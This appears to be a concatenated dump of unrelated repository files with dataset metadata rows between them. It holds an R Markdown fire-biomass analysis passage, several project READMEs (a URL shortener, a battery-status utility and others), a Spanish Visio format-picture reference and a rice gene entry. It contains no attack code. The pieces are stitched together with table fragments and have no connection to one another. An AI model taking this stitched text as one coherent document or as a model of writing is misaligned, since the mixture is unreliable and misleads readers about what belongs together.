Staggerbefore<-rbind(rep1,rep2,rep3,rep4,rep5)
#write.csv(StaggerAfter,"StaggerAfter_428.csv")
#write.csv(Staggerbefore,"Staggerbefore_428.csv")
```
``` r
StaggerAfter<-read.csv('StaggerAfter_428.csv')
Staggerbefore<-read.csv('StaggerBefore_428.csv')
StaggerAfter$Fire[StaggerAfter$Fire=="Fire"]<-"Burned Sites (Delayed Mortality)"
#Stagger0$Fire[Stagger0$Fire=="NoFire"]<-"Unburned Landscape"
Fire<-StaggerAfter[StaggerAfter$Fire=="Burned Sites (Delayed Mortality)",]
#Fire0<-Staggeneg1[Staggeneg1$Fire=="Fire",]
Fire$Prior<-Staggerbefore$Value[Staggerbefore$Fire=="Fire"]
#print(Fire)
(sum(Fire$Value)-sum(Fire$Prior))/sum(Fire$Prior)
```
## [1] -0.1770432
``` r
Fire$Delta<-(Fire$Value-Fire$Prior)/Fire$Prior
Bars<-aggregate(x=list(Before=Fire$Prior,After=Fire$Value),by=list(Fire$Species),FUN=sum)
Bars$Dif<-(Bars$After-Bars$Before)/Bars$Before
#Bars
### Comparing total
#sum(Fire$Prior)
par(mar=c(8,8,8,8),bg="white")
barplot(Bars$Dif[order(Bars$Dif)]*100,names.arg=Bars$Group.1[order(Bars$Dif)],
las=1,col="grey",xlab="Mean percent decrease biomass",horiz=T)
```
<!-- -->
``` r
Before<-Bars[1:2]
Before$Model<-"Before"
After<-Bars[c(1,3)]
After$Model<-"After"
colnames(After)<-colnames(Before)
Data2<-rbind(Before,After)
g_legend<-function(a.gplot){
tmp <- ggplot_gtable(ggplot_build(a.gplot))
leg <- which(sapply(tmp$grobs, function(x) x$name) == "guide-box")
legend <- tmp$grobs[[leg]]
return(legend)}
p1 <- ggplot(Data2, aes(x=Group.1, y=Before,fill=Model)) +
ggtitle("mean biomass before/after fire") +
#stat_compare_means(method = "wilcox.test",label = "p.format",size =6 )+# fill=name allow to automatically dedicate a color for each group
geom_bar(stat="identity", position=position_dodge())+
theme_classic(base_size =16 )+
theme(legend.position="none")+
xlab("") +
ylab("Biomass g/m2")
p1
```
<!-- -->
| 38.204326 | 202 | 0.702957 | yue_Hant | 0.802591 |
9a4d99d168b94b6abe69001d55322819e0adf815 | 92 | md | Markdown | README.md | segvan/HearthAnalytics | b5dd2db359becf13d44332c321b9989e8ecee109 | [
"MIT"
] | null | null | null | README.md | segvan/HearthAnalytics | b5dd2db359becf13d44332c321b9989e8ecee109 | [
"MIT"
] | null | null | null | README.md | segvan/HearthAnalytics | b5dd2db359becf13d44332c321b9989e8ecee109 | [
"MIT"
] | null | null | null | # HearthAnalytics API
HearthAnalytics API is a backend for the HearthAnalytics application.
| 30.666667 | 69 | 0.847826 | eng_Latn | 0.829975 |
9a4db7d8d68de0fcab7ea7e34fd27b9491c61b5f | 1,660 | md | Markdown | README.md | NFarrington/vatsim-url-shortener | bdee75bf84f7ef07daa8c2c70fb9d36a556ee8e4 | [
"MIT"
] | 4 | 2018-04-16T17:35:30.000Z | 2021-10-08T11:35:11.000Z | README.md | NFarrington/vats.im | d50d525fbfa23068228cf41ccb1a00038302f02b | [
"MIT"
] | 5 | 2019-04-28T12:53:59.000Z | 2020-06-28T23:55:17.000Z | README.md | NFarrington/vats.im | d50d525fbfa23068228cf41ccb1a00038302f02b | [
"MIT"
] | 1 | 2020-08-10T04:47:03.000Z | 2020-08-10T04:47:03.000Z | <p align="center">
<a href="https://travis-ci.org/NFarrington/vatsim-url-shortener"><img src="https://travis-ci.org/NFarrington/vatsim-url-shortener.svg" alt="Build Status"></a>
<a href="https://styleci.io/repos/128128792"><img src="https://styleci.io/repos/128128792/shield?style=flat" alt="Style Status"></a>
<a href="https://codeclimate.com/github/NFarrington/vatsim-url-shortener/maintainability"><img src="https://api.codeclimate.com/v1/badges/9e5d0eca2309ed1defd2/maintainability" alt="Maintainability"></a>
<a href="https://codeclimate.com/github/NFarrington/vatsim-url-shortener/test_coverage"><img src="https://api.codeclimate.com/v1/badges/9e5d0eca2309ed1defd2/test_coverage" alt="Test Coverage"></a>
<a href="https://hub.docker.com/r/nfarrington/vats.im-nginx"><img src="https://img.shields.io/docker/cloud/build/nfarrington/vats.im-nginx.svg?label=docker%20nginx" alt="Docker Build Status (nginx)"></a>
<a href="https://hub.docker.com/r/nfarrington/vats.im-php-fpm"><img src="https://img.shields.io/docker/cloud/build/nfarrington/vats.im-php-fpm.svg?label=docker%20php-fpm" alt="Docker Build Status (php-fpm)"></a>
</p>
# VATS.IM URL Shortener
[VATS.IM](https://vats.im/) is a URL shortening service designed for [VATSIM](https://vatsim.net/). The service offers short URLs across multiple domains, and URL prefixes for official VATSIM entities.
To make a feature request, or to report an issue, please [submit a new GitHub issue](https://github.com/NFarrington/vatsim-url-shortener/issues/new) or contact [support@vats.im](mailto:support@vats.im).
## License
Licensed under the [MIT license](https://opensource.org/licenses/MIT).
| 87.368421 | 213 | 0.755422 | eng_Latn | 0.155343 |
9a4e0046251af6fee332cca8545aa503700ec0c9 | 2,558 | md | Markdown | README.md | njzhangyifei/battery_charge | 332ae2babf9e78a6d1fd25e8161984e0485f5132 | [
"MIT"
] | 2 | 2016-04-03T15:33:35.000Z | 2021-05-25T16:47:12.000Z | README.md | njzhangyifei/battery_charge | 332ae2babf9e78a6d1fd25e8161984e0485f5132 | [
"MIT"
] | null | null | null | README.md | njzhangyifei/battery_charge | 332ae2babf9e78a6d1fd25e8161984e0485f5132 | [
"MIT"
] | 2 | 2017-12-11T10:36:00.000Z | 2018-11-28T09:37:57.000Z | # ./battery_charge
`battery_charge` is a simple cross-platform command line utility (python3) for checking battery status.
All the script does is to show the current battery percentage and whether it is charging.
### Dependency
- Python 3
- Linux: `upower` UPower command line tool (comes with the system for Ubuntu)
- OS X: `ioreg` (comes with the system)
- Windows: `wmi` python module
- install with `pip install wmi` using the `pip` from python 3
### Install
- `./setup.py install` (run with `sudo` on Linux)
### Platform Tested
- Windows 10
- OS X 10.10.5 (Yosemite)
- Ubuntu 14.04 (Trusty Tahr)
### Usage
You will need to put "X:/Python3X/Scripts" into your PATH on Windows.
```bash
$ battery_charge
99 ac_power
```
Use `read` command to get both the battery percentage and the status into variables.
```bash
$ bat_info=`battery_charge | tr -d '\r\n'`
$ read bat_percentage bat_status <<< $bat_info
$ echo $bat_percentage
95
$ echo $bat_status
discharging
```
### About Battery Status
| Status Value | Linux | Mac | Windows |
|--------------|--------------------------|---------------|-----------------------------------------------------------------------------------|
| discharging | battery is discharging | same | same |
| charging | battery is charging | same | same |
| ac_power | battery is fully charged | same as Linux | battery is not necessarily fully charged, but the system is running on AC adapter |
### Use with zsh (or any other shell)
You could create a battery segment on $PS1 using this script with Oh-my-zsh + agnoster theme.
Here are some demos. See `demo/zsh_prompt` for more detail.
#### Mac
- Running on AC adapter

- Charging

#### Windows
- Changing from Battery to AC adapter

- Low Battery Warning (<20%)

### License
The MIT License (MIT)
| 34.567568 | 143 | 0.614152 | eng_Latn | 0.883987 |
9a4e3bf1b0dfa0ed8988a4b81294139dea242768 | 70 | md | Markdown | README.md | xiaopebaka/raincheck | 35344a44a5ab83915362e29b0f70dd3f03743051 | [
"MIT"
] | null | null | null | README.md | xiaopebaka/raincheck | 35344a44a5ab83915362e29b0f70dd3f03743051 | [
"MIT"
] | null | null | null | README.md | xiaopebaka/raincheck | 35344a44a5ab83915362e29b0f70dd3f03743051 | [
"MIT"
] | null | null | null | 
#### 介绍
小工具 有天气预报功能和倒计时 功能还在完善中
| 11.666667 | 35 | 0.671429 | yue_Hant | 0.278 |
9a4e69a9c63ec4b372483f59d43b893d79f56664 | 20,696 | md | Markdown | docs/visio/about-format-pictures.md | MicrosoftDocs/office-developer-client-docs.es-ES | d4568d789fd46de778fdecb250a28fb84b4bf02e | [
"CC-BY-4.0",
"MIT"
] | 2 | 2020-05-19T18:52:21.000Z | 2021-04-21T00:13:46.000Z | docs/visio/about-format-pictures.md | MicrosoftDocs/office-developer-client-docs.es-ES | d4568d789fd46de778fdecb250a28fb84b4bf02e | [
"CC-BY-4.0",
"MIT"
] | 3 | 2021-12-08T02:36:34.000Z | 2021-12-08T03:08:40.000Z | docs/visio/about-format-pictures.md | MicrosoftDocs/office-developer-client-docs.es-ES | d4568d789fd46de778fdecb250a28fb84b4bf02e | [
"CC-BY-4.0",
"MIT"
] | 2 | 2018-10-24T20:53:01.000Z | 2019-10-13T18:19:17.000Z | ---
title: Imágenes de formato
manager: soliver
ms.date: 03/09/2015
ms.audience: Developer
ms.topic: overview
f1_keywords:
- Vis_DSS.chm82251831
ms.localizationpriority: medium
ms.assetid: df4c1c70-8b41-c046-7415-643188af0e06
description: Las imágenes de formato se utilizan para determinar cómo se muestra un valor. Por ejemplo, puede controlar el número de dígitos que aparecen a la derecha o a la izquierda del separador decimal o si una cadena de texto se muestra en mayúsculas o en minúsculas.
ms.openlocfilehash: 3e9510f4e2056477f5c0a1298d9fd76894a07ec2
ms.sourcegitcommit: a1d9041c20256616c9c183f7d1049142a7ac6991
ms.translationtype: MT
ms.contentlocale: es-ES
ms.lasthandoff: 09/24/2021
ms.locfileid: "59598951"
---
# <a name="about-format-pictures"></a>Imágenes de formato
Las imágenes de formato se utilizan para determinar cómo se muestra un valor. Por ejemplo, puede controlar el número de dígitos que aparecen a la derecha o a la izquierda del separador decimal o si una cadena de texto se muestra en mayúsculas o en minúsculas.
> [!NOTE]
> Para definir una imagen de formato de fecha u hora usando el formato de Microsoft Office System, coloque la imagen entre llaves dobles, por ejemplo, "{{d/m/aa}}". Si usa un formato predefinido, por ejemplo, 201, escríbalo entre llaves y corchetes angulares, como este: "{ \<201\> }"
En las secciones siguientes se muestran los símbolos que puede usar para dar formato a distintos tipos de valores para mostrar.
## <a name="string-and-numeric-values"></a>Cadenas y valores numéricos
|**Carácter**|**Descripción**|
|:-----|:-----|
|# <br/> |Marcador de posición de dígito. Muestra un dígito o no muestra nada. Los ceros a la izquierda y a la derecha no se muestran. Si a la izquierda del decimal hay más dígitos que marcadores, se muestran todos los dígitos. Si a la derecha del decimal hay más dígitos que marcadores, la fracción se redondea al número total de marcadores. En el caso de una dimensión, si el marcador es el dígito situado más a la izquierda, no se muestran las subunidades distintas de cero. <br/> Por ejemplo, FORMAT(0ft 11,25pda,"#,##u") muestra 11,25pda. <br/> |
|0 <br/> |Marcador de posición de dígito (cero). Muestra un dígito o no muestra nada. Se muestran los ceros a la izquierda y a la derecha. Si a la izquierda del decimal hay más dígitos que marcadores, se muestran todos los dígitos. Si a la derecha del decimal hay más dígitos que marcadores, la fracción se redondea al número total de marcadores. En el caso de una dimensión, se muestran las subunidades que son cero. <br/> Por ejemplo, FORMAT(2ft 11,33pda,"0,## u") muestra 2 ft 11,33 pda. <br/> |
|. <br/> |Marcador de posición decimal. Determina el número de dígitos que aparecen a la izquierda y a la derecha del separador decimal. En las unidades con varias partes, los decimales se aplican a la subunidad más pequeña (la situada más a la derecha). Muestra el carácter decimal definido en la **configuración regional y de idioma** del sistema (Panel de control).<br/> Por ejemplo, FORMAT(250 cm,"0,000 u") muestra 250,000 cm. <br/> |
|, <br/> |Separador de miles. Si está rodeado de marcadores de posición de dígitos (# ó 0), separa los miles de los cientos en los números que tengan cuatro o más dígitos a la izquierda del separador decimal. Muestra el separador de miles definido en la **configuración regional y de idioma** del sistema (Panel de control).<br/> |
|E- E+ e- e+ <br/> |Formato científico. Si el formato contiene al menos un marcador de posición de dígito a la derecha de estos símbolos, el número se muestra en formato científico. Inserta E o e entre el número y su exponente. En el caso de E+ o e+, se muestra el signo más (+) delante de los exponentes positivos y el signo menos (-) delante de los exponentes negativos. En el caso de E- o e-, sólo aparece el signo menos (-) cuando el exponente es negativo. <br/> Por ejemplo, FORMAT(12345,67,"###,#e+#") muestra 123,5e+2. <br/> |
|u o U <br/> |Marcador de posición de etiqueta abreviada. Inserta indicadores de unidad abreviada después de cada subunidad. Por ejemplo: pda., pies, gra. El marcador de posición U inserta etiquetas de mayúsculas y minúsculas, mientras que el marcador de posición u inserta etiquetas en minúsculas. Inserta delante de la etiqueta el mismo número de espacios que hay delante del marcador de posición. <br/> Por ejemplo, FORMAT(12 c 13 d,"#u") muestra 13c1. <br/> |
|uu o UU <br/> |Marcador de posición de etiqueta larga. Inserta etiquetas de unidad después de cada subunidad. Por ejemplo: pulgadas, pies, grados El marcador de posición U inserta etiquetas de mayúsculas y minúsculas, mientras que el marcador de posición u inserta etiquetas en minúsculas. Inserta delante de la etiqueta el mismo número de espacios que hay delante del marcador de posición. <br/> Por ejemplo, FORMAT(12,43pda,"# #/4 UU") muestra 12 2/4 PULGADAS. <br/> |
|uuu o UUU <br/> |Marcador de posición de etiqueta universal. Inserta la forma universal (interna de Visio) de las etiquetas de unidad después de cada subunidad. El marcador de posición U inserta etiquetas de mayúsculas y minúsculas, mientras que el marcador de posición u inserta etiquetas en minúsculas. Inserta delante de la etiqueta el mismo número de espacios que hay delante del marcador de posición. <br/> |
|/ <br/> |Marcador de posición de fracción. Muestra una expresión como un número entero con una fracción si hay un marcador de posición de dígito. En caso contrario, muestra sólo el número entero en el numerador. Si a continuación del marcador de posición de dígito del denominador hay un número, se redondea la fracción hasta la siguiente cuyo numerador sea 1 y se simplifica. Si en el denominador se especifica un número sin el marcador de posición de dígito, se redondea a la siguiente fracción, pero no se simplifica. <br/> Por ejemplo, FORMAT(12,43,"# #/4") muestra 12 2/4. <br/> |
|espacio <br/> |Muestra un carácter de espacio en la salida con formato. Para mostrar otro carácter, use la barra diagonal inversa ( \) carácter. <br/> |
## <a name="currency-values"></a>Valores de moneda
|**Carácter**|**Descripción**|
|:-----|:-----|
|$ <br/> |Símbolo de moneda. Muestra el símbolo de moneda definido en la **configuración regional y de idioma** del sistema (Panel de control).<br/> |
|u o U <br/> |Marcador de posición de etiqueta abreviada. Inserta el símbolo estándar de la moneda local o la abreviatura de tres caracteres para las monedas no locales. Por ejemplo, $99,00, 42,70 FRF. El marcador de posición u inserta minúsculas y U inserta etiquetas de mayúsculas y minúsculas. <br/> |
|uu o UU <br/> |Marcador de posición de etiqueta larga. Inserta etiquetas de moneda largas detrás de cada subunidad. Por ejemplo: dólar USA, Franco francés. El marcador de posición u inserta minúsculas y U inserta etiquetas de mayúsculas y minúsculas. <br/> |
|uuu o UUU <br/> |Marcador de posición de etiqueta universal. Inserta las abreviaturas universales de tres caracteres para todas las monedas después de cada subunidad. Por ejemplo, 99,00 USD, 42,70 FRF. El marcador de posición u inserta minúsculas y U inserta etiquetas de mayúsculas y minúsculas. Inserta delante de la etiqueta el mismo número de espacios que hay delante del marcador de posición. <br/> |
## <a name="text-values"></a>Valores de texto
|**Carácter**|**Descripción**|
|:-----|:-----|
|\ <br/> |Muestra el siguiente carácter tal y como es. Para mostrar el carácter de barra diagonal inversa, escriba \\ . Vea también "texto". <br/> |
|"texto" o 'texto' <br/> |Muestra el texto entre comillas tal y como es. Vea también \ (barra inversa). <br/> |
|@ <br/> |Marcador de posición de texto. Reemplaza una cadena si el valor de una expresión es una cadena. <br/> Por ejemplo, FORMAT("Hola", "'Ha escrito ('@')'") da como resultado "Ha escrito (Hola)". <br/> |
|@+ <br/> |Marcador de posición de texto en mayúsculas. En el caso de valores de cadena, pasa el valor a mayúsculas. <br/> Por ejemplo, FORMAT("Hola", "@ @+ @-") da como resultado "Hola HOLA hola". <br/> |
|@- <br/> |Marcador de posición de texto. En el caso de valores de cadena, pasa el valor a minúsculas. <br/> Por ejemplo, FORMAT("Hola", "@ @+ @-") da como resultado "Hola HOLA hola". <br/> |
## <a name="date-values"></a>Valores de fecha
|**Carácter**|**Descripción**|
|:-----|:-----|
|c o C <br/> |Marcador de posición de fecha u hora. Muestra los valores de fecha y hora con formato corto (c) o largo (C), y el formato de hora genérico. Las versiones 4.0 y anteriores de Visio omiten este marcador de posición. <br/> Por ejemplo: FORMAT(DATETIME("25/6/07 12:05"),"C") muestra lunes, 25 de junio de 2007 12:05:00 p.m. FORMAT(DATETIME("25 Jun 2007"),"c") muestra 25/6/07. <br/> |
|/ <br/> |Separador de fecha. Si la expresión es una fecha, separa sus componentes. Muestra el separador de fecha definido en la **configuración regional y de idioma** del sistema (Panel de control).<br/> |
| [ ] <br/> |Marcador de posición de fechas transcurridas. Se utiliza con los marcadores de posición d, dd y ww para mostrar las unidades de duración. <br/> Por ejemplo, [d] o [dd] son los días transcurridos y [w] o [ww] son las semanas transcurridas. <br/> |
|d <br/> |Marcador de posición de día. Muestra el día como un número (de 1 a 31), sin cero a la izquierda. <br/> |
|dd <br/> | Marcador de posición de día. Muestra el día como un número (de 01 a 31), con cero a la izquierda. <br/> |
|ddd o w <br/> |Marcador de posición del día de la semana abreviado. Muestra el día abreviado (de Lun a Dom). <br/> |
|dddd o w <br/> |Marcador de posición del día de la semana sin abreviar. Muestra el día como un nombre completo (de lunes a domingo). <br/> |
|ddddd <br/> |Marcador de posición de fecha abreviada. Muestra una fecha con la forma corta definida en la **configuración regional y de idioma** del sistema (Panel de control).<br/> |
|dddd <br/> |Marcador de posición de fecha sin abreviar. Muestra una fecha con la forma larga definida en la **configuración regional y de idioma** del sistema (Panel de control).<br/> |
|D <br/> |Marcador de día para chino tradicional. Muestra el día del mes como una representación textual del número ordinal. Específico de la configuración regional. <br/> |
|D_c <br/> |Marcador de posición de día para chino tradicional. Muestra el día del mes como una representación textual del número ordinal. Independiente de la configuración regional del usuario. <br/> |
|w_c o w_c <br/> |Marcador de posición de día para chino tradicional. Independiente de la configuración regional del usuario. <br/> |
|w_e <br/> |Marcador de posición del día de la semana abreviado en inglés. Muestra el día abreviado (de Sun a Sat). Independiente de la configuración regional del usuario. <br/> |
|w_j <br/> |Marcador de posición del día de la semana abreviado en japonés. Muestra el día abreviado. Independiente de la configuración regional del usuario. <br/> |
|w_k <br/> |Marcador de posición del día de la semana abreviado en coreano. Muestra el día abreviado. Independiente de la configuración regional del usuario. <br/> |
|w_s o w_s <br/> |Marcador de posición de día para chino simplificado. Independiente de la configuración regional del usuario. <br/> |
|ww_e <br/> |Marcador de posición del día de la semana sin abreviar en inglés. Muestra el día como un nombre completo (de Sunday a Saturday). Independiente de la configuración regional del usuario. <br/> |
|ww_j <br/> |Marcador de posición del día de la semana sin abreviar en japonés. Muestra el día como un nombre completo. Independiente de la configuración regional del usuario. <br/> |
|w_k <br/> |Marcador de posición del día de la semana sin abreviar en coreano. Muestra el día como un nombre completo. Independiente de la configuración regional del usuario. <br/> |
|M <br/> |Marcador de posición de mes. Muestra el mes como un número (de 1 a 12), sin cero a la izquierda. Vea también m (marcador de posición de minutos). <br/> |
|MM <br/> |Marcador de posición de mes. Muestra el mes como un número (de 01 a 12), con cero a la izquierda. Vea también mm (marcador de posición de minutos). <br/> |
|MMM <br/> |Marcador de posición de mes. Muestra el mes en forma abreviada (de Ene a Dic). <br/> |
|MMMM <br/> |Marcador de posición de mes. Muestra el nombre completo del mes (de enero a diciembre). <br/> |
|MMMM_c <br/> |Marcador de posición del mes en chino tradicional. Muestra el nombre completo del mes. Independiente de la configuración regional del usuario. <br/> |
|MMMM_e <br/> |Marcador de posición del mes en inglés. Muestra el nombre completo del mes. Independiente de la configuración regional del usuario. <br/> |
|yy <br/> |Marcador de posición de año. Muestra el año como un número de dos dígitos (de 00 a 99). <br/> |
|yyyy <br/> |Marcador de posición de año. Muestra el año como un número de cuatro dígitos (de 1900 a 2078). <br/> |
|g <br/> |Marcador de posición de año. Específico de la configuración regional. En japonés, muestra la versión abreviada para la era Gengo. En coreano, muestra la etiqueta del año coreano, seguida de un espacio. <br/> |
|g_j <br/> |Marcador de posición de año. En japonés, muestra la versión abreviada para la era Gengo. Independiente de la configuración regional del usuario. <br/> |
|gg o G <br/> |Marcador de posición de año. Específico de la configuración regional. En chino tradicional, muestra la versión abreviada de la etiqueta del año. En japonés, muestra la versión abreviada para la era Gengo en Kanji. En coreano, muestra la etiqueta del año coreano, seguida de un espacio. <br/> |
|gg_c <br/> |Marcador de posición de año. En chino tradicional, muestra la versión abreviada de la etiqueta del año. Independiente de la configuración regional del usuario. <br/> |
|gg_j <br/> |Marcador de posición de año. En japonés, muestra la versión abreviada para la era Gengo en Kanji. Independiente de la configuración regional del usuario. <br/> |
|gg_k <br/> |Marcador de posición de año. En coreano, muestra la etiqueta del año coreano, seguida de un espacio. Independiente de la configuración regional del usuario. <br/> |
|ggg o GG <br/> |Marcador de posición de año. Específico de la configuración regional. En chino tradicional, muestra la versión completa de la etiqueta del año. En japonés, muestra la versión completa para la era Gengo en Kanji. En coreano, muestra la etiqueta del año coreano, seguida de un espacio. <br/> |
|ggg_c <br/> |Marcador de posición de año. En chino tradicional, muestra la versión completa de la etiqueta del año. Independiente de la configuración regional del usuario. <br/> |
|ggg_j <br/> |Marcador de posición de año. En japonés, muestra la versión completa para la era Gengo en Kanji. Independiente de la configuración regional del usuario. <br/> |
|e <br/> |Marcador de posición de año. Específico de la configuración regional. En chino tradicional, muestra la cadena que representa el año Juliano. En japonés, muestra el año Gengo como uno o dos dígitos, sin cero a la izquierda. En coreano, muestra el año coreano como un número arábigo de cuatro dígitos. <br/> |
|e_c <br/> |Marcador de posición de año. En chino tradicional, muestra la cadena que representa el año juliano. Independiente de la configuración regional del usuario. <br/> |
|e_j <br/> |Marcador de posición de año. En japonés, muestra el año Gengo como uno o dos dígitos arábigos. Independiente de la configuración regional del usuario. <br/> |
|e_k <br/> |Marcador de posición de año. En coreano, muestra el año coreano como un número arábigo de cuatro dígitos. Independiente de la configuración regional del usuario. <br/> |
|E <br/> |Marcador de posición de año. Específico de la configuración regional. En chino tradicional, muestra la cadena que representa el año de la república. En japonés, muestra el año Gengo como uno o dos dígitos, sin cero a la izquierda. En coreano, muestra el año coreano como un número arábigo de cuatro dígitos. <br/> |
|E_c <br/> |Marcador de posición de año. En chino tradicional, muestra la cadena que representa el año de la república. Independiente de la configuración regional del usuario. <br/> |
|ee <br/> |Marcador de posición de año. Específico de la configuración regional. En chino tradicional, muestra la cadena que representa el año Juliano. En japonés, muestra el año Gengo como uno o dos dígitos arábigos, con un cero a la izquierda si es necesario. En coreano, muestra el año coreano como un número arábigo de cuatro dígitos. <br/> |
|ee_j <br/> |Marcador de posición de año. En japonés, muestra el año Gengo con dos dígitos arábigos. Independiente de la configuración regional del usuario. <br/> |
|EE <br/> |Marcador de posición de año. Específico de la configuración regional. En chino tradicional, muestra la cadena que representa el año de la república. En japonés, muestra el año Gengo como uno o dos dígitos arábigos, con un cero a la izquierda si es necesario. En coreano, muestra el año coreano como un número arábigo de cuatro dígitos. <br/> |
|n o N <br/> |Marcador de posición de año. Específico de la configuración regional. En chino tradicional, muestra el año de la república como un número arábigo. En japonés, muestra el año Gengo como uno o dos dígitos, sin cero a la izquierda. En coreano, muestra el año coreano como un número arábigo de cuatro dígitos. <br/> |
|n_c <br/> |Marcador de posición de año. En chino tradicional, muestra el año de la república como un número arábigo. Independiente de la configuración regional del usuario. <br/> |
|nn o NN <br/> |Marcador de posición de año. Específico de la configuración regional. En chino tradicional, muestra el año de la república como un número arábigo. En japonés, muestra el año Gengo como uno o dos dígitos arábigos, con un cero a la izquierda si es necesario. En coreano, muestra el año coreano como un número arábigo de cuatro dígitos. <br/> |
## <a name="time-values"></a>Valores de hora
|**Carácter**|**Descripción**|
|:-----|:-----|
|: <br/> |Separador de hora. Muestra la hora definida en la **configuración regional y de idioma** del sistema (Panel de control).<br/> |
|[ ] <br/> |Marcador de posición de tiempo transcurrido. Se utiliza con los marcadores de posición h, hh, m, mm, s y ss para mostrar las unidades de duración. Por ejemplo, [h] o [hh] son las horas, [m] o [mm] los minutos y [s] o [ss] los segundos transcurridos. <br/> |
|h <br/> |Marcador de posición de hora. Muestra la hora sin cero a la izquierda, en formato de 12 horas (de 0 a 12). <br/> |
|hh <br/> |Marcador de posición de hora. Muestra la hora con cero a la izquierda, en formato de 12 horas (de 00 a 12). <br/> |
|H <br/> |Marcador de posición de hora. Muestra la hora sin cero a la izquierda, en formato de 24 horas (de 0 a 24). <br/> |
|HH <br/> |Marcador de posición de hora. Muestra la hora con cero a la izquierda, en formato de 24 horas (de 00 a 24). <br/> |
|m <br/> |Marcador de posición de minuto. Muestra los minutos sin cero a la izquierda (de 0 a 59). <br/> |
|mm <br/> |Marcador de posición de minuto. Muestra los minutos con cero a la izquierda (de 00 a 59). <br/> |
|s <br/> |Marcador de posición de segundo. Muestra los segundos sin cero a la izquierda (de 0 a 59). <br/> |
|ss <br/> |Marcador de posición de segundo. Muestra los segundos con cero a la izquierda (de 00 a 59). <br/> |
|t <br/> |Abreviatura a.m. o p.m. Muestra la abreviatura definida en la **configuración regional y de idioma** del sistema (Panel de control).<br/> |
|tt <br/> |Indicador de a.m. o p.m. Muestra el indicador completo definido en la **configuración regional y de idioma** del sistema (Panel de control).<br/> |
|t_c o tt_c <br/> |Indicador a.m. o p.m. en chino tradicional. Muestra el indicador. Independiente de la configuración regional del usuario. <br/> |
|t_k o tt_k <br/> |Indicador a.m. o p.m. en coreano. Muestra el indicador. Independiente de la configuración regional del usuario. <br/> |
|t_j o tt_j <br/> |Indicador a.m. o p.m. en japonés. Muestra el indicador. Independiente de la configuración regional del usuario. <br/> |
|t_e <br/> |Indicador a.m. o p.m. en inglés. Muestra el indicador abreviado. Independiente de la configuración regional del usuario. <br/> |
|tt_e <br/> |Indicador a.m. o p.m. en inglés. Muestra el indicador completo. Independiente de la configuración regional del usuario. <br/> |
|t_s o tt_s <br/> |Indicador a.m. o p.m. en chino simplificado. Muestra el indicador. Independiente de la configuración regional del usuario. <br/> |
|T <br/> |Formato de hora general. <br/> |
| 147.828571 | 589 | 0.738597 | spa_Latn | 0.99093 |
9a4e6ac8ad3a499916baaa36cc4cdf7f20403e40 | 549 | md | Markdown | README.md | MobleyLab/orphans | 1df2e708e4515806c72ecc9e45a236a0d194c876 | [
"BSD-3-Clause"
] | null | null | null | README.md | MobleyLab/orphans | 1df2e708e4515806c72ecc9e45a236a0d194c876 | [
"BSD-3-Clause"
] | null | null | null | README.md | MobleyLab/orphans | 1df2e708e4515806c72ecc9e45a236a0d194c876 | [
"BSD-3-Clause"
] | 1 | 2021-04-01T04:32:13.000Z | 2021-04-01T04:32:13.000Z | # orphans
Orphaned tools/scripts that might be useful but don't currently have a good home elsewhere in our public repositories.
Some of these may be migrated at a future date.
# LICENSE
Tools here are licensed under the BSD 3 clause license (BSD-3) unless otherwise noted in the individual files.
We reserve the right to re-license tools contributed to this repository under other licenses as we deem appropriate.
# MANIFEST
- analysis: Contains tools relating to analysis of MD simulations
# CONTRIBUTORS
- Gaetano Calabro
- David Mobley
| 28.894737 | 119 | 0.790528 | eng_Latn | 0.998593 |
9a4e88a034fb33f5fa7a105fb7df949cc9725f0f | 6,249 | md | Markdown | _posts/OS/W/2015-01-20-OsWRKY28.md | funRiceGenes/funRiceGenes.github.io | e27a14e23dd8c3d6127e38ee62240dc9e01008be | [
"MIT"
] | 4 | 2017-08-09T02:48:10.000Z | 2020-11-11T01:54:08.000Z | _posts/OS/W/2015-01-20-OsWRKY28.md | funRiceGenes/funRiceGenes.github.io | e27a14e23dd8c3d6127e38ee62240dc9e01008be | [
"MIT"
] | 1 | 2020-05-31T13:03:01.000Z | 2020-06-01T01:47:14.000Z | _posts/OS/W/2015-01-20-OsWRKY28.md | funRiceGenes/funRiceGenes.github.io | e27a14e23dd8c3d6127e38ee62240dc9e01008be | [
"MIT"
] | 6 | 2018-10-03T20:47:32.000Z | 2021-07-19T01:58:31.000Z | ---
layout: post
title: "OsWRKY28"
description: ""
category: genes
tags: [transcription factor, defense, disease resistance, disease, blast, defense response, magnaporthe oryzae, root, seedling, development, oxidative stress, oxidative, root development, root elongation, reproductive, architecture, homeostasis, ja , fertility, JA, phosphate, root system architecture]
---
* **Information**
+ Symbol: OsWRKY28
+ MSU: [LOC_Os06g44010](http://rice.uga.edu/cgi-bin/ORF_infopage.cgi?orf=LOC_Os06g44010)
+ RAPdb: [Os06g0649000](http://rapdb.dna.affrc.go.jp/viewer/gbrowse_details/irgsp1?name=Os06g0649000)
* **Publication**
+ [OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus](http://www.ncbi.nlm.nih.gov/pubmed?term=OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus%5BTitle%5D), 2013, Plant Mol Biol.
+ [OsWRKY IIa Transcription Factors Modulate Rice Innate Immunity](http://www.ncbi.nlm.nih.gov/pubmed?term=OsWRKY IIa Transcription Factors Modulate Rice Innate Immunity%5BTitle%5D), 2010, Rice (N Y).
+ [Building a mutant resource for the study of disease resistance in rice reveals the pivotal role of several genes involved in defence](http://www.ncbi.nlm.nih.gov/pubmed?term=Building a mutant resource for the study of disease resistance in rice reveals the pivotal role of several genes involved in defence%5BTitle%5D), 2012, Mol Plant Pathol.
+ [The WRKY Gene Family in Rice Oryza sativa](http://www.ncbi.nlm.nih.gov/pubmed?term=The WRKY Gene Family in Rice Oryza sativa%5BTitle%5D), 2007, J Integr Plant Biol.
+ [OsWRKY28 Regulates Phosphate and Arsenate Accumulation, Root System Architecture and Fertility in Rice.](http://www.ncbi.nlm.nih.gov/pubmed?term=OsWRKY28 Regulates Phosphate and Arsenate Accumulation, Root System Architecture and Fertility in Rice.%5BTitle%5D), 2018, Front Plant Sci.
* **Genbank accession number**
+ [AK106282](http://www.ncbi.nlm.nih.gov/nuccore/AK106282)
+ [BK005031](http://www.ncbi.nlm.nih.gov/nuccore/BK005031)
+ [AK106282](http://www.ncbi.nlm.nih.gov/nuccore/AK106282)
+ [BK005031](http://www.ncbi.nlm.nih.gov/nuccore/BK005031)
* **Key message**
+ The transcription factor OsWRKY28 acts as a negative regulator of basal resistance, like the orthologous barley gene
